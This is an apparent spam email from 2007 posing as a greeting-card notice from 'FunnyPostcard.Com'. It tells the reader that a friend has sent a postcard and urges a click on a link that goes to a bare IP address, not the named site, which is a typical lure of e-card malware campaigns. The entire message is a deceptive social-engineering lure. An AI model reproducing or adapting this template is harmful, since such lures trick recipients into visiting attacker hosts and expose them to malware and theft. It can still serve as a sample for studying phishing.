Subject: Friend sent you a postcard from FunnyPostcard.Com!

From: "FunnyPostcard.Com" <[email-masked]>
Date: Fri, 10 Aug 2007 13:02:17 +0100

Friend has created a greeting card for you at FunnyPostcard.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 498bb5cc61301cba46921636c804814655dc2 

To see your custom greeting card, simply click on the link below: 
http://71.196.144.186/?498bb5cc61301cba46921636c804814655dc2

Send greeting cards from FunnyPostcard.Com whenever you want by visiting us at: 
http://FunnyPostcard.Com/
Copyright (c) 1996-2007 FunnyPostcard.Com All Rights Reserved